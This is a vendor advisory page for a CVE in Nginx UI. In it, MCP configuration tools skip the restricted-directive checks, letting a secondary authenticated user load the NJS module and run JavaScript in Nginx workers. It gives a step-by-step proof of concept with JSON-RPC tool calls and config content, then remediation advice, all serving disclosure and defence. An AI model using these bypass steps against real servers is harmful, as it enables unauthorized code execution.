CVE-2026-84319

CVE-2026-84319 is a high-severity security vulnerability in github.com/0xJacky/Nginx-UI (go), affecting versions < 1.9.10-0.20260703131214-23d1934099b0. It is fixed in 1.9.10-0.20260703131214-23d1934099b0.

Does this CVE actually affect you?

Kodem shows which CVEs are reachable and running in your applications, so you fix what's exploitable, not just what's listed.

Thank you! Your submission has been received!
Oops! Something went wrong while submitting the form.

Runtime intelligence, not another scanner.

Summary

Nginx UI: MCP configuration tools bypass restricted directive validation and allow secondary authenticated users to execute NJS in Nginx worker context

The regular HTTP configuration API rejects restricted Nginx directives such as load_module, js_import, and js_content.

However, the MCP configuration interface allows a secondary authenticated user to write and apply equivalent restricted configuration content. In the lab, this allowed the user to load ngx_http_js_module.so, import attacker-controlled JavaScript, reload Nginx, and execute NJS in the Nginx worker context.

This is authenticated and is not OS command execution by itself.

Affected component

  • /mcp
  • /mcp_message
  • MCP tool: nginx_config_add
  • Nginx configuration validation

Minimal PoC

Preconditions

  • Attacker has a secondary authenticated Nginx UI account.
  • MCP is enabled.
  • Nginx has NJS available:
find / -name "ngx_http_js_module.so" 2>/dev/null

Observed in the lab:

/usr/lib/nginx/modules/ngx_http_js_module.so

1. HTTP API blocks the restricted config

Request:

POST /api/configs
Authorization: <SECONDARY_USER_JWT>
Content-Type: application/json

Body:

{
 "name": "nginx.conf",
 "base_dir": "",
 "overwrite": true,
 "sync_node_ids": [],
 "content": "load_module modules/ngx_http_js_module.so;\n\nuser nginx;\nworker_processes auto;\n\nevents { worker_connections 1024; }\n\nhttp {\n js_import poc from /etc/nginx/poc.js;\n server {\n listen 127.0.0.1:18249;\n location /__poc { js_content poc.handler; }\n }\n}\n"
}

Observed result:

Rejected because the content contains restricted directives such as load_module/js_import/js_content.

2. MCP writes the JavaScript file

Open an MCP session and call tools/call with:

{
 "jsonrpc": "2.0",
 "id": 1,
 "method": "tools/call",
 "params": {
 "name": "nginx_config_add",
 "arguments": {
 "name": "poc.js",
 "base_dir": "",
 "overwrite": true,
 "sync_node_ids": [],
 "content": "function handler(r) { r.return(200, \"MCP_NJS_MARKER\\n\"); }\nexport default { handler };\n"
 }
 }
}

3. MCP writes the NJS-enabled nginx.conf

Call tools/call again:

{
 "jsonrpc": "2.0",
 "id": 2,
 "method": "tools/call",
 "params": {
 "name": "nginx_config_add",
 "arguments": {
 "name": "nginx.conf",
 "base_dir": "",
 "overwrite": true,
 "sync_node_ids": [],
 "content": "load_module modules/ngx_http_js_module.so;\n\nuser nginx;\nworker_processes auto;\n\nerror_log /var/log/nginx/error.log notice;\npid /run/nginx.pid;\n\nevents { worker_connections 1024; }\n\nhttp {\n default_type application/octet-stream;\n js_import poc from /etc/nginx/poc.js;\n server {\n listen 127.0.0.1:18249;\n location /__poc { js_content poc.handler; }\n }\n}\n"
 }
 }
}

4. Verify NJS execution

Inside the Nginx UI container:

curl -i http://127.0.0.1:18249/__poc

Observed response:

HTTP/1.1 200 OK

MCP_NJS_MARKER

This confirms that content rejected by the HTTP API can be applied through MCP and executed as NJS in the Nginx worker context.

Expected behavior

MCP configuration tools should enforce the same restricted directive validation as the HTTP API.

Impact

A secondary authenticated user can bypass the restricted directive validation enforced by the HTTP API and execute attacker-controlled NJS inside the Nginx worker context.

This may allow modification of Nginx runtime behavior, including responses, routing, headers, redirects, and request handling.

CVE-2026-84319 has a CVSS score of 8.3 (High). The vector is network-reachable, low privileges required, and no user interaction. A CVSS score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether this affects your application depends on whether the vulnerable code is present and reachable in your environment. A fixed version is available (1.9.10-0.20260703131214-23d1934099b0); upgrading removes the vulnerable code path.

Affected versions

github.com/0xJacky/Nginx-UI (< 1.9.10-0.20260703131214-23d1934099b0)

Security releases

github.com/0xJacky/Nginx-UI → 1.9.10-0.20260703131214-23d1934099b0 (go)

Kodem intelligence

Severity tells you how bad this could be in the worst case. It does not tell you whether you are exposed. Exploitability and impact are functions of runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A vulnerable package can sit in your dependency tree and never run.

Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter. Kodem's runtime-powered SCA identifies whether this CVE is reachable in your applications.

Already deployed Kodem?

See it in your environmentNew to Kodem? Get a demo →

Remediation advice

Apply ValidateConfigFile(path, content) before MCP configuration writes and ensure HTTP API and MCP share the same validation tests for restricted directives such as:

  • load_module
  • js_import
  • js_content
  • js_set
  • perl_set
  • user root

Frequently Asked Questions

  1. What is CVE-2026-84319? CVE-2026-84319 is a high-severity security vulnerability in github.com/0xJacky/Nginx-UI (go), affecting versions < 1.9.10-0.20260703131214-23d1934099b0. It is fixed in 1.9.10-0.20260703131214-23d1934099b0.
  2. How severe is CVE-2026-84319? CVE-2026-84319 has a CVSS score of 8.3 (High). This score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether it represents real risk in your environment depends on whether the vulnerable code is present and reachable.
  3. Which versions of github.com/0xJacky/Nginx-UI are affected by CVE-2026-84319? github.com/0xJacky/Nginx-UI (go) versions < 1.9.10-0.20260703131214-23d1934099b0 is affected.
  4. Is there a fix for CVE-2026-84319? Yes. CVE-2026-84319 is fixed in 1.9.10-0.20260703131214-23d1934099b0. Upgrade to this version or later.
  5. Is CVE-2026-84319 exploitable, and should I be worried? Whether CVE-2026-84319 is exploitable in your environment depends on whether the vulnerable code is present and reachable. A CVSS score is a worst-case rating; it does not account for your specific deployment, configuration, or usage patterns. Kodem, an Intelligent Application Security platform, uses runtime intelligence to show which vulnerabilities actually execute in production, so you can focus on the ones that represent real risk. Get a demo
  6. What actually determines whether CVE-2026-84319 is exploitable, and how bad it is? Exploitability and impact are not fixed properties of a CVE. They depend on runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A high CVSS score on a dependency that never runs is not the same as real risk. Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter.
  7. How do I fix CVE-2026-84319? Upgrade github.com/0xJacky/Nginx-UI to 1.9.10-0.20260703131214-23d1934099b0 or later.

Other vulnerabilities in github.com/0xJacky/Nginx-UI

Stop the waste.
Protect your environment with Kodem.